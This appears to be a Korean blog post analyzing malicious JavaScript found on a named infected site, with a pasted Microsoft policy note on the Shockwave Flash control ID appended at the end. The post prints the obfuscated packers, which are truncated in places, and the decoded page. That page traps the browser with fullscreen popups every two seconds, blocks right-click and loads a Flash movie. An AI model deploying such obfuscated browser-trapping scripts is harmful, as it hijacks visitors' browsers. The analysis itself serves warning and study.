clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 포함된 Script

감염 사이트 : http://www.imslow.kr/ghost/index.html
* 악성 링크이니 조심하시기 바랍니다!

<script language="javascript">
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('143(58(46,41,40,45,43,44){43=58(40){65(40<41?\'\':43(153(40/41)))+((40=40%41)>35?92.166(40+29):40.169(36))};91(!\'\'.90(/^/,92)){93(40--){44[43(40)]=45[40]||43(40)}45=[58(43){65 44[43]}];43=58(){65\'\\\\57+\'};40=1};93(40--){91(45[40]){46=46.90(159 161(\'\\\\42\'+43(40)+\'\\\\42\',\'48\'),45[40])}}65 46}(\'133.98(88(88
생략


</script>
<script language="javascript">
window.onerror=function(){ return true; }
</script>
<script language="JavaScript">
function decrypt(x){
       y="";
    for(i=0; i<x.length; i++){
    y += String.fromCharCode(x.charCodeAt(i)-3);
    }
    r="";
    for(i=y.length-1;i>=0;i--){
    r += y.substr(i,1);
    }
    return r;
}
mm = new Function(decrypt(unescape("%3E%2C%2C%2C%2C%25D38585%28H68585%28wslufv2F68585%28D38585%28G%3A8585%28E%3A8585%28%3C58585%28h%3B58585%28kfwdfG%3A8585%28%3C58585%28558585%2899%3B%3A%3B679%3A555%3A35713%3B3%3C%3C89584%3B9748%3B6136%3C7%3C%3A69%3C6%3A77%3A5%3B91385%3A%3B%3A596%3A373%3B34%3A138%3C5%3B5%3C37%3A%3B9%3A55%3B813558585%28%3B58585%28hwluz1%7Cgre1wqhpxfrgE%3A8585%28%7CuwD38585%28H68585%28558585%28wslufVdydM558585%28G68585%28hjdxjqdo358585%28wslufvF68585%28D38585%28H68585%28wslufv2F68585%28D38585%28G%3A8585%28E%3A8585%28%3C58585%28h%3B58585%28kfwdfG%3A8585%28%3C58585%28558585%28%3B%3A%
생략
3A8%3C613558585%28%3B58585%28hwluz1%7Cgre1wqhpxfrgE%3A8585%28%7CuwD38585%28H68585%28558585%28wslufVdydM558585%28G68585%28hjdxjqdo358585%28wslufvF68585%28%25+hsdfvhqx+hsdfvhqx+hsdfvhqx+hwluz1wqhpxfrg")));
mm();

각각의 출력이 다르다 !

1.

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1x.N(1e(1e
(생략)

2.

document.write(unescape(unescape("%253CHTML%253E%250D%250A%253CHEAD%253E%250D%250A%253CTITLE%253EHello%2520World%2520%253A%2529%2520Do%2520u%2520want%2520to%2520see%2520ghost%253F%2520%2528contact@imslow.kr%2529%253C/TITLE%253E%250D%250A%253CSCRIPT%2520language%253D%2522JavaScript%2522%253E%250D%250A%253C%
생략)));

두 함수 모두 결국은
 

<HTML>
<HEAD>
<TITLE>Hello World :) Do u want to see ghost? (contact@imslow.kr)</TITLE>
<SCRIPT language="JavaScript">
<!--
// try to maximize!
function maximizeWindow()
{
 try {
  top.window.moveTo(0,0);
  if (document.all) {
   top.window.resizeTo(screen.availWidth,screen.availHeight);
  }
  else if (document.layers||document.getElementById) {
   if (top.window.outerHeight<screen.availHeight||top.window.outerWidth<screen.availWidth){
    top.window.outerHeight = screen.availHeight;
    top.window.outerWidth = screen.availWidth;
   }
  }
 } catch(e) { }
}
maximizeWindow();

function eventIgnored()
{
 try {
  if(event) {
   event.cancelBubble = true;
   event.returnValue = false;
  }
 } catch(e)
 { }
 return false;
}

function open_window()
{
 try {
  window.open(self.location, "_blank", "resizable=no,fullscreen=yes,toolbar=no,menubar=no,status=no,titlebar=no,loca
tion=no,directories=no");
 } catch(e) { }
}

function try_open()
{
 try {
  open_window();
  setTimeout(try_open, 2000);
 } catch(e) { }
}

function set_DisableRight()
{
 try {
  document.oncontextmenu = eventIgnored;
  document.ondragstart = eventIgnored;
  document.onselectstart = eventIgnored;
  setTimeout(set_DisableRight, 100);
 } catch(e)
 { }
}

function fm() {
 var s = "";
 s += '<object type="application/x-shockwave-flash" ';
 s += 'classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" ';
 s += 'codebase="http://fpdownload.macromedia.com
 s += 'pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0"';
 s += 'id="ghostmovie" width="100%" height="100%">';
 s += '<param name="movie" value="ghost.swf">';
 s += '<param name="quality" value="high">'; 
 s += '<param name="menu" value="false">';
 s += '<param name="swliveconnect" value="true">';
 s += '<param name="scale" value="exactFit">';
 s += '<embed src="ghost.swf" quality="high" menu="false" ';
 s += 'width="100%" height="100%" swliveconnect="true" scale="exactFit" ';
 s += 'id="ghostmovie" name="ghostmovie" type="application/x-shockwave-flash" ';
 s += 'pluginspage="http://www.macromedia.com/go/getflashplayer"><\/embed>';
 s += '<\/object>';
 document.write(s);
}
setTimeout(try_open, 2000);
setTimeout(set_DisableRight, 100);
// -->
</SCRIPT>
</HEAD>
<BODY bgcolor=white onload="document.bgColor='black'" onunload="open_window();open_window();alert('Gotcha!\tHey man :)');" onmousedown="if(event.button==2){alert("Gotcha!");}" leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 oncontextmenu="return false" ondragstart="return false" onselectstart="return false" unselectable="on" style="cursor: default;">
<SCRIPT language="JavaScript">
 fm();
</SCRIPT>
</BODY>
</HTML>

clsid:d27cdb6e-ae6d-11cf-96b8-444553540000

clsid:d27cdb6e-ae6d-11cf-96b8-444553540000

{D27CDB6E-AE6D-11CF-96B8-444553540000}

Updated: March 28, 2003

Applies To: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\AllowedControls

Description

Stores configuration data for the policy setting Shockwave Flash.

Change Method

To change the value of this entry, use the Group Policy Object Editor (Gpedit.msc). The corresponding policy is located in \Windows Components\Internet Explorer\Administrator Approved Controls.